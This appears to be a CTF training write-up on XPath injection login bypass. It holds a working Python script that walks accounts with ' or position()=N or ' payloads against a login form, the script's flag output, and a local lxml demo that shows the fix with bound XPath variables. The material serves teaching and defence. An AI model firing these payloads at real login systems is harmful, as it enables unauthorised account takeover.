Auth bypass

XPath authentication bypass via position() account walk

Iterates accounts in an XPath login filter by injecting position()=N into the username field.

The login query is typically //user[username='INPUT' and password='INPUT']. Injecting ' or position()=N or ' into username rewrites the predicate to username='' or position()=N or '' and password='INPUT'. Because and binds tighter than or in XPath, the trailing or ' turns the password check into '' and password='INPUT', which is always false (an empty string is boolean false), so the predicate reduces to position()=N and the Nth user node is selected without a valid password. position() is 1-based and counts user nodes under each parent, so against a flat <users> list looping N over a small range walks every account one at a time; the loop stops on a success marker (here a flag substring) that indicates a privileged or flag-bearing account was returned. A blanket tautology such as ' or 1=1 or ' matches every user node, but the application acts on the first node returned, so it only ever yields the first account; position() is what makes each distinct account reachable.

import requests, urllib3
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)

PROXIES = {"http": "http://127.0.0.1:8080", "https": "http://127.0.0.1:8080"}  # intercepting proxy
s = requests.Session()

LOGIN = "https://target/login.php"

# Server filter ~ //user[username='INPUT' and password='INPUT'].
# The payload turns the predicate into username='' or position()=N or '' and password='x';
# the last clause is always false, so the Nth user node is selected without a password.
def login_as(index):
    data = {"username": f"' or position()={index} or '", "password": "x"}
    r = s.post(LOGIN, data=data, verify=False, proxies=PROXIES, timeout=10)
    return r.text

for i in range(1, 100):                     # position() is 1-based; 0 never matches
    body = login_as(i)
    if "HTB" in body:                       # success marker: flag / privileged page
        print(f"[+] account index {i} returned a flag")
        print(body)
        break
    print(f"[-] index {i}")

success body

[+] account index 3 returned a flag
<h2>Welcome superuser!</h2><p>HTB{baa4759ac0d153ec234a72df5d99bf56}</p>
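
To see the predicate rewrite against a real XPath engine rather than a remote target, here is an added example (not code from the original page or the CWEE module) that runs the same payloads with lxml against a constructed in-memory user store. The user names, passwords and roles in USERS_XML and the function names vulnerable_login, safe_login and walk_accounts are assumptions for illustration. It also shows the fix the page does not spell out: binding the credentials as XPath variables so user input is never parsed as query syntax.

```python
from lxml import etree

# Constructed sample user store (assumption, not data from the page).
USERS_XML = b"""
<users>
  <user><username>admin</username><password>admin-pw</password><role>admin</role></user>
  <user><username>alice</username><password>alice-pw</password><role>user</role></user>
  <user><username>bob</username><password>bob-pw</password><role>user</role></user>
  <user><username>superuser</username><password>super-pw</password><role>flag</role></user>
</users>
"""
DOC = etree.fromstring(USERS_XML)


def vulnerable_login(username, password):
    """Server-side filter built by string interpolation, as the page describes.

    Returns the username of the first matched node (what a typical app logs in as),
    or None when the predicate matches nothing.
    """
    query = f"//user[username='{username}' and password='{password}']"
    nodes = DOC.xpath(query)
    return nodes[0].findtext("username") if nodes else None


def safe_login(username, password):
    """Same filter with XPath variables ($u, $p): values are bound, never parsed as syntax."""
    nodes = DOC.xpath("//user[username=$u and password=$p]", u=username, p=password)
    return nodes[0].findtext("username") if nodes else None


def walk_accounts(max_positions=10):
    """Replays the page's position() walk locally.

    Returns {N: username} for every N that selected a node; stops at the first
    index that matches nothing, which is how the walk detects the end of the list.
    """
    found = {}
    for n in range(1, max_positions + 1):          # position() is 1-based
        who = vulnerable_login(f"' or position()={n} or '", "x")
        if who is None:
            break
        found[n] = who
    return found


if __name__ == "__main__":
    print("normal login      :", vulnerable_login("alice", "alice-pw"))
    print("tautology         :", vulnerable_login("' or 1=1 or '", "x"))      # first node only
    print("precedence gotcha :", vulnerable_login("' or '1'='1", "x"))        # and binds tighter
    print("position() walk   :", walk_accounts())
    print("safe_login payload:", safe_login("' or position()=4 or '", "x"))
```

The precedence gotcha is worth noting: ' or '1'='1 in the username field with a bogus password produces username='' or '1'='1' and password='x', which is false because the tautology is and-ed with the password clause; the trailing or ' in the page's payload is what swallows that clause. safe_login rejects every payload because the engine compares the literal string against the username element instead of interpreting it.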

Find by: xpath auth bypass login position() account enumeration walk users flag · Source: CWEE/XPath Injection - Authentication Bypass